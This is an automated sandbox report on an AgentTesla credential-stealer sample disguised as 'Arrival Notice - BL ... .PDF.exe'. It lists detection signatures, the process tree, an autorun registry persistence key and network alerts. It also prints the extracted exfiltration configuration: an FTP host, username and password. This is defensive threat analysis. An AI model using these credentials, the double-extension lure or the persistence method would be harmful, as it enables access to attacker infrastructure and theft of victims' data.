Edit tour

Windows Analysis Report
Arrival Notice - BL 713410220035.PDF.exe

Overview

General Information

Sample name:	Arrival Notice - BL 713410220035.PDF.exe
Analysis ID:	1491468
MD5:	b9ee0c2ba1d0961eb00aa101730ec076
SHA1:	66e5bde292ad6d8a6c7227c376d5c7e3e7a68e2a
SHA256:	0f497b23b90b11f7b6b2f7b8e3aff0618fb3325eed93ac43e4046b82af8d1257
Tags:	exe
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Suspicious Double Extension File Execution

Yara detected AgentTesla

.NET source code references suspicious native API functions

AI detected suspicious sample

Connects to many ports of the same IP (likely port scanning)

Contains functionality to log keystrokes (.Net Source)

Drops executable to a common third party application directory

Hides that the sample has been downloaded from the Internet (zone.identifier)

Initial sample is a PE file and has a suspicious name

Installs a global keyboard hook

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Uses an obfuscated file name to hide its real file extension (double extension)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Uses 32bit PE files

Uses FTP

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Arrival Notice - BL 713410220035.PDF.exe (PID: 432 cmdline: "C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe" MD5: B9EE0C2BA1D0961EB00AA101730EC076)

Arrival Notice - BL 713410220035.PDF.exe (PID: 6936 cmdline: "C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe" MD5: B9EE0C2BA1D0961EB00AA101730EC076)

adobe.exe (PID: 6776 cmdline: "C:\Users\user\AppData\Roaming\adobe\adobe.exe" MD5: B9EE0C2BA1D0961EB00AA101730EC076)

adobe.exe (PID: 3804 cmdline: "C:\Users\user\AppData\Roaming\adobe\adobe.exe" MD5: B9EE0C2BA1D0961EB00AA101730EC076)

adobe.exe (PID: 3492 cmdline: "C:\Users\user\AppData\Roaming\adobe\adobe.exe" MD5: B9EE0C2BA1D0961EB00AA101730EC076)

adobe.exe (PID: 4972 cmdline: "C:\Users\user\AppData\Roaming\adobe\adobe.exe" MD5: B9EE0C2BA1D0961EB00AA101730EC076)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://s4.serv00.com", "Username": "f2241_dol", "Password": "Doll900#@"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000008.00000002.4611154293.0000000002EBC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.4609963887.0000000002A81000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.4609963887.0000000002A81000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.4609963887.0000000002AAC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.2361618882.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.2361618882.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.2364755330.000000000358C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.2364755330.0000000003561000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.2364755330.0000000003561000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000008.00000002.4611154293.0000000002E91000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.4611154293.0000000002E91000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.2147638567.00000000037E9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2147638567.00000000037E9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: Arrival Notice - BL 713410220035.PDF.exe PID: 432	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Arrival Notice - BL 713410220035.PDF.exe PID: 432	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: Arrival Notice - BL 713410220035.PDF.exe PID: 6936	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Arrival Notice - BL 713410220035.PDF.exe PID: 6936	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: adobe.exe PID: 3804	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: adobe.exe PID: 3804	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: adobe.exe PID: 4972	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: adobe.exe PID: 4972	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 16 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.Arrival Notice - BL 713410220035.PDF.exe.396e440.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Arrival Notice - BL 713410220035.PDF.exe.396e440.3.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Arrival Notice - BL 713410220035.PDF.exe.396e440.3.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x32162:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x321d4:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3225e:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x322f0:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3235a:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x323cc:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x32462:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x324f2:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.Arrival Notice - BL 713410220035.PDF.exe.396e440.3.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x2f4ad:$s2: GetPrivateProfileString 0x2eb59:$s3: get_OSFullName 0x301ab:$s5: remove_Key 0x30371:$s5: remove_Key 0x31230:$s6: FtpWebRequest 0x32144:$s7: logins 0x326b6:$s7: logins 0x35399:$s7: logins 0x35479:$s7: logins 0x36dca:$s7: logins 0x36013:$s9: 1.85 (Hash, version 2, native byte-order)
0.2.Arrival Notice - BL 713410220035.PDF.exe.3932e10.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Arrival Notice - BL 713410220035.PDF.exe.3932e10.2.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Arrival Notice - BL 713410220035.PDF.exe.3932e10.2.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x32162:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x321d4:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3225e:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x322f0:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3235a:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x323cc:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x32462:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x324f2:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.Arrival Notice - BL 713410220035.PDF.exe.3932e10.2.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x2f4ad:$s2: GetPrivateProfileString 0x2eb59:$s3: get_OSFullName 0x301ab:$s5: remove_Key 0x30371:$s5: remove_Key 0x31230:$s6: FtpWebRequest 0x32144:$s7: logins 0x326b6:$s7: logins 0x35399:$s7: logins 0x35479:$s7: logins 0x36dca:$s7: logins 0x36013:$s9: 1.85 (Hash, version 2, native byte-order)
5.2.adobe.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.adobe.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.adobe.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33f62:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33fd4:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3405e:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x340f0:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3415a:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x341cc:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x34262:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x342f2:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
5.2.adobe.exe.400000.0.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x312ad:$s2: GetPrivateProfileString 0x30959:$s3: get_OSFullName 0x31fab:$s5: remove_Key 0x32171:$s5: remove_Key 0x33030:$s6: FtpWebRequest 0x33f44:$s7: logins 0x344b6:$s7: logins 0x37199:$s7: logins 0x37279:$s7: logins 0x38bca:$s7: logins 0x37e13:$s9: 1.85 (Hash, version 2, native byte-order)
0.2.Arrival Notice - BL 713410220035.PDF.exe.396e440.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Arrival Notice - BL 713410220035.PDF.exe.396e440.3.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Arrival Notice - BL 713410220035.PDF.exe.396e440.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33f62:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x6f382:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33fd4:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x6f3f4:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3405e:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x6f47e:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x340f0:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x6f510:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3415a:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x6f57a:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x341cc:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x6f5ec:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x34262:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x6f682:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x342f2:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x6f712:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.Arrival Notice - BL 713410220035.PDF.exe.396e440.3.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x312ad:$s2: GetPrivateProfileString 0x6c6cd:$s2: GetPrivateProfileString 0x30959:$s3: get_OSFullName 0x6bd79:$s3: get_OSFullName 0x31fab:$s5: remove_Key 0x32171:$s5: remove_Key 0x6d3cb:$s5: remove_Key 0x6d591:$s5: remove_Key 0x33030:$s6: FtpWebRequest 0x6e450:$s6: FtpWebRequest 0x33f44:$s7: logins 0x344b6:$s7: logins 0x37199:$s7: logins 0x37279:$s7: logins 0x38bca:$s7: logins 0x6f364:$s7: logins 0x6f8d6:$s7: logins 0x725b9:$s7: logins 0x72699:$s7: logins 0x73fea:$s7: logins 0x37e13:$s9: 1.85 (Hash, version 2, native byte-order)
0.2.Arrival Notice - BL 713410220035.PDF.exe.3932e10.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Arrival Notice - BL 713410220035.PDF.exe.3932e10.2.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Arrival Notice - BL 713410220035.PDF.exe.3932e10.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33f62:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x6f592:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0xaa9b2:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x33fd4:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x6f604:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0xaaa24:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x3405e:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x6f68e:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0xaaaae:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x340f0:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x6f720:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0xaab40:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3415a:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x6f78a:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0xaabaa:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x341cc:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x6f7fc:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0xaac1c:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x34262:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x6f892:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0xaacb2:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
0.2.Arrival Notice - BL 713410220035.PDF.exe.3932e10.2.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x312ad:$s2: GetPrivateProfileString 0x6c8dd:$s2: GetPrivateProfileString 0xa7cfd:$s2: GetPrivateProfileString 0x30959:$s3: get_OSFullName 0x6bf89:$s3: get_OSFullName 0xa73a9:$s3: get_OSFullName 0x31fab:$s5: remove_Key 0x32171:$s5: remove_Key 0x6d5db:$s5: remove_Key 0x6d7a1:$s5: remove_Key 0xa89fb:$s5: remove_Key 0xa8bc1:$s5: remove_Key 0x33030:$s6: FtpWebRequest 0x6e660:$s6: FtpWebRequest 0xa9a80:$s6: FtpWebRequest 0x33f44:$s7: logins 0x344b6:$s7: logins 0x37199:$s7: logins 0x37279:$s7: logins 0x38bca:$s7: logins 0x6f574:$s7: logins
0.2.Arrival Notice - BL 713410220035.PDF.exe.3852970.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Arrival Notice - BL 713410220035.PDF.exe.3852970.4.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.Arrival Notice - BL 713410220035.PDF.exe.3852970.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x114402:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x14fa32:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x18ae52:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x114474:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x14faa4:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x18aec4:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x1144fe:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x14fb2e:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x18af4e:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x114590:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x14fbc0:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x18afe0:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x1145fa:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x14fc2a:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x18b04a:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x11466c:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x14fc9c:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x18b0bc:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x114702:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x14fd32:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x18b152:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
0.2.Arrival Notice - BL 713410220035.PDF.exe.3852970.4.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x11174d:$s2: GetPrivateProfileString 0x14cd7d:$s2: GetPrivateProfileString 0x18819d:$s2: GetPrivateProfileString 0x110df9:$s3: get_OSFullName 0x14c429:$s3: get_OSFullName 0x187849:$s3: get_OSFullName 0x11244b:$s5: remove_Key 0x112611:$s5: remove_Key 0x14da7b:$s5: remove_Key 0x14dc41:$s5: remove_Key 0x188e9b:$s5: remove_Key 0x189061:$s5: remove_Key 0x1134d0:$s6: FtpWebRequest 0x14eb00:$s6: FtpWebRequest 0x189f20:$s6: FtpWebRequest 0x1143e4:$s7: logins 0x114956:$s7: logins 0x117639:$s7: logins 0x117719:$s7: logins 0x11906a:$s7: logins 0x14fa14:$s7: logins
Click to see the 19 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Double Extension File Execution

Source: Process started

Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe", CommandLine: "C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe", CommandLine|base64offset|contains: 6bq, Image: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe, NewProcessName: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe, OriginalFileName: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe", ProcessId: 432, ProcessName: Arrival Notice - BL 713410220035.PDF.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\adobe\adobe.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Arrival Notice - BL 713410220035.PDF.exe, ProcessId: 6936, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\adobe

Suricata Signatures

ET MALWARE AgentTesla Exfil via FTP - Source IP: 192.168.2.6 - Destination IP: 213.189.52.181

Timestamp:	2024-08-12T11:34:03.487379+0200
SID:	2029927
Severity:	1
Source Port:	49714
Destination Port:	21
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Agent Tesla CnC Exfil Activity - Source IP: 192.168.2.6 - Destination IP: 213.189.52.181

Timestamp:	2024-08-12T11:34:04.044240+0200
SID:	2855542
Severity:	1
Source Port:	49716
Destination Port:	63831
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Agent Tesla CnC Exfil Activity - Source IP: 192.168.2.6 - Destination IP: 213.189.52.181

Timestamp:	2024-08-12T11:34:25.300722+0200
SID:	2855542
Severity:	1
Source Port:	49729
Destination Port:	63877
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Agent Tesla CnC Exfil Activity - Source IP: 192.168.2.6 - Destination IP: 213.189.52.181

Timestamp:	2024-08-12T11:34:25.306377+0200
SID:	2855542
Severity:	1
Source Port:	49729
Destination Port:	63877
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Agent Tesla CnC Exfil Activity - Source IP: 192.168.2.6 - Destination IP: 213.189.52.181

Timestamp:	2024-08-12T11:34:04.038781+0200
SID:	2855542
Severity:	1
Source Port:	49716
Destination Port:	63831
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE AgentTesla Exfil via FTP - Source IP: 192.168.2.6 - Destination IP: 213.189.52.181

Timestamp:	2024-08-12T11:34:24.517170+0200
SID:	2029927
Severity:	1
Source Port:	49728
Destination Port:	21
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 5.2.adobe.exe.400000.0.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://s4.serv00.com", "Username": "f2241_dol", "Password": "Doll900#@"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe	Virustotal: Detection: 56%			Perma Link

Multi AV Scanner detection for submitted file

Source: Arrival Notice - BL 713410220035.PDF.exe	ReversingLabs: Detection: 63%
Source: Arrival Notice - BL 713410220035.PDF.exe	Virustotal: Detection: 56%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Adobe\adobe.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Arrival Notice - BL 713410220035.PDF.exe

Joe Sandbox ML: detected

Source: Arrival Notice - BL 713410220035.PDF.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.6:49726 version: TLS 1.2

Source: Arrival Notice - BL 713410220035.PDF.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: Arrival Notice - BL 713410220035.PDF.exe, 00000000.00000002.2150284020.0000000004F40000.00000004.08000000.00040000.00000000.sdmp, Arrival Notice - BL 713410220035.PDF.exe, 00000000.00000002.2147483427.00000000027E1000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000004.00000002.2285789058.0000000003351000.00000004.00000800.00020000.00000000.sdmp, adobe.exe, 00000007.00000002.2364700073.0000000003469000.00000004.00000800.00020000.00000000.sdmp

Networking

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 213.189.52.181 ports 63881,63831,63877,1,2,21

Source: global traffic

TCP traffic: 192.168.2.6:49716 -> 213.189.52.181:63831

Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152

Source: Joe Sandbox View

ASN Name: ECO-ATMAN-PLECO-ATMAN-PL ECO-ATMAN-PLECO-ATMAN-PL

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: unknown

FTP traffic detected: 213.189.52.181:21 -> 192.168.2.6:49714 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 11:34. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 11:34. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 150 allowed.220-Local time is now 11:34. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 15 minutes of inactivity.

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: s4.serv00.com
Source: global traffic	DNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa

Source: Network traffic	Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.6:49716 -> 213.189.52.181:63831
